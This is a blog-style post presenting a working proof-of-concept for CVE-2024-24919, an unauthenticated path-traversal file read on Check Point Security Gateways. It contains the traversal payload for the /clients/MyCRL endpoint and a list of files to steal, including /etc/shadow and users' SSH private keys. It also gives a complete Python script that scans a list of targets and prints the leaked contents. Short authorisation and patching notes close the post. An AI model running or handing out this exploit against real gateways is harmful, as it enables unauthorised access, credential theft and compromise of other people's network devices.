
CVE-2024-24919

Allows an attacker to read certain files from Internet-exposed Check Point Security Gateways that have the Remote Access VPN or Mobile Access Software Blades enabled. The PoC below sends no credentials, so the read is reachable without authentication.

A proof-of-concept Python script that exploits what is essentially a path-traversal issue: the `/clients/MyCRL` endpoint accepts a POST body of the form `aCSHELL/../../../../../../../<path>` and returns the contents of the named file.

Below is a list of files worth retrieving — including /etc/shadow, which holds the password hashes, and users' SSH private keys. Note that the `*` in the two `home/*/.ssh/` entries is a placeholder, not a wildcard: the traversal reads one exact path, so substitute a real account name (usernames can be taken from /etc/passwd, entry 5).

  1. ../../../../../../../etc/fstab
  2. ../../../../../../../etc/shadow
  3. ../../../../../../../sysimg/CPwrapper/SU/Products.conf
  4. ../../../../../../../config/db/initial
  5. ../../../../../../../etc/passwd
  6. ../../../../../../../home/*/.ssh/authorized_keys
  7. ../../../../../../../opt/checkpoint/conf/
  8. ../../../../../../../etc/ssh/sshd_config
  9. ../../../../../../../etc/vpn/vpn.conf
  10. ../../../../../../../home/*/.ssh/id_rsa

The PoC Script

import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings: make_request() deliberately sends verify=False
# (presumably because the gateways present self-signed certificates), and
# urllib3 would otherwise emit an InsecureRequestWarning for every target.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Substrings make_request() looks for in the response body to decide that a
# file read succeeded. Both occur in /etc/passwd and /etc/shadow (the default
# payload). NOTE(review): other files in the list above (fstab, sshd_config,
# vpn.conf, ...) are unlikely to contain them, so a successful -f read of such
# a file is reported as "not vulnerable" — confirm before trusting a negative.
vuln: list[str] = ['root:', 'nobody:']

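# Default payload; a response to it is labelled as /etc/shadow in the output.
_SHADOW_PAYLOAD = "aCSHELL/../../../../../../../etc/shadow"


def _print_boxed(title, body):
    """Print *title* inside a banner box, then *body* inside a second box.

    Layout mirrors the original PoC output: the title is left-padded by 22
    spaces and the body is printed verbatim between two borders.
    """
    border_top = "╔══════════════════════════════════════════════════════╗"
    border_bottom = "╚══════════════════════════════════════════════════════╝"
    inner_width = len(border_top) - 2
    print(border_top)
    print(f"║{' ' * 22}{title:<{inner_width - 22}}║")
    print(border_bottom)
    print(border_top)
    print(f"                      {body}                ")
    print(border_bottom)


def make_request(url, payload=None, headers=None, *, timeout=10):
    """POST *payload* to *url* and report whether the response looks like a leaked file.

    A target counts as vulnerable when the response has a non-error status
    and contains one of the marker substrings in the module-level ``vuln``
    list (tuned to passwd/shadow content). The leaked body is then printed.

    Args:
        url: Full endpoint URL (the caller appends ``/clients/MyCRL``).
        payload: Raw request body — the traversal string. ``None`` sends an
            empty body.
        headers: Optional dict of HTTP headers to send.
        timeout: Seconds to wait for connect/read before giving up. Without
            it one unresponsive host stalls the whole multi-target scan.

    Returns:
        ``True`` if a marker was found in a successful response, ``False``
        otherwise (including on HTTP errors and transport failures, which
        are reported on stdout rather than raised).
    """
    try:
        # verify=False: certificate validation is deliberately skipped, so the
        # peer is NOT authenticated — acceptable only against hosts you own.
        response = requests.post(url, data=payload, headers=headers,
                                 verify=False, timeout=timeout)
    except requests.RequestException as e:
        print(f"Error making request to {url}: {e}")
        return False

    if not response.ok:
        print(f"[-] {url} responded with status code: {response.status_code}")
        return False

    # Any single marker hit is treated as confirmation of the read.
    if not any(marker in response.text for marker in vuln):
        print(f"[-] {url} is not vulnerable")
        return False

    print(f"[+] {url} is vulnerable")
    if payload:
        if payload.startswith(_SHADOW_PAYLOAD):
            _print_boxed("etc/shadow found:", response.text)
        else:
            _print_boxed("Your file was found:", response.text)
    return True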

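def main():
    """Command-line entry point: probe each listed target for CVE-2024-24919.

    ``-l FILE`` names a text file with one ``http://`` or ``https://`` base
    URL per line; ``/clients/MyCRL`` is appended to each before the request
    is sent by ``make_request``. ``-f PATH`` replaces the default
    ``etc/shadow`` read with another path, given relative to the filesystem
    root (a leading ``/`` is tolerated).
    """
    parser = argparse.ArgumentParser(description="CVE-2024-24919 POC")
    parser.add_argument("-l", metavar='filename', type=str,
                        help="File containing list of HTTP/HTTPS targets")
    parser.add_argument("-f", metavar='file', type=str,
                        help="File to read for custom payload (May break on multiple targets with unknown files.)")
    args = parser.parse_args()

    # Browser-like headers. "br" is deliberately absent from Accept-Encoding:
    # urllib3 only decodes Brotli when the optional brotli package is
    # installed, and an undecoded body would hide the marker strings that
    # make_request looks for, producing a false "not vulnerable".
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "none",
        "Sec-Fetch-User": "?1",
        "Dnt": "1",
        "Sec-Gpc": "1",
        "Te": "trailers",
        "Connection": "close"
    }

    # The traversal climbs to "/" (".." at the root stays at the root, so any
    # surplus segments are harmless) and the requested path is appended.
    payload_base = "aCSHELL/../../../../../../../{}"
    # Strip a leading "/" so "/etc/passwd" and "etc/passwd" give the same payload.
    target_path = args.f.lstrip("/") if args.f else "etc/shadow"
    payload = payload_base.format(target_path)

    if not args.l:
        print("Please provide a file containing list of HTTP/HTTPS targets using -l option.")
        return

    try:
        with open(args.l, 'r') as file:
            for line in file:
                url = line.strip()
                if not url:
                    continue  # blank line, not a target
                if url.startswith(('http://', 'https://')):
                    # Drop a trailing "/" so the endpoint path is not doubled
                    # into "//clients/MyCRL".
                    make_request(url.rstrip('/') + '/clients/MyCRL',
                                 payload=payload, headers=headers)
                else:
                    print(f"Skipping invalid URL: {url}")
    except FileNotFoundError:
        print(f"Error: File '{args.l}' not found.")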

# Script entry point; guarded so importing the module (e.g. to reuse
# make_request) does not start a scan.
if __name__ == "__main__":
    main()

Finding targets



Example of usage


Example of output


This is for educational purposes only. Run it solely against systems you own or are explicitly authorised to test; anything else is illegal.

Check Point released a hotfix for this; you can read more about it here: https://support.checkpoint.com/results/sk/sk182336. Because the readable files include /etc/shadow and SSH private keys, patching alone does not undo an earlier exposure — treat any gateway that was reachable while unpatched as potentially compromised, and rotate its local account passwords and SSH keys after applying the hotfix.

This post is licensed under CC BY 4.0 by the author.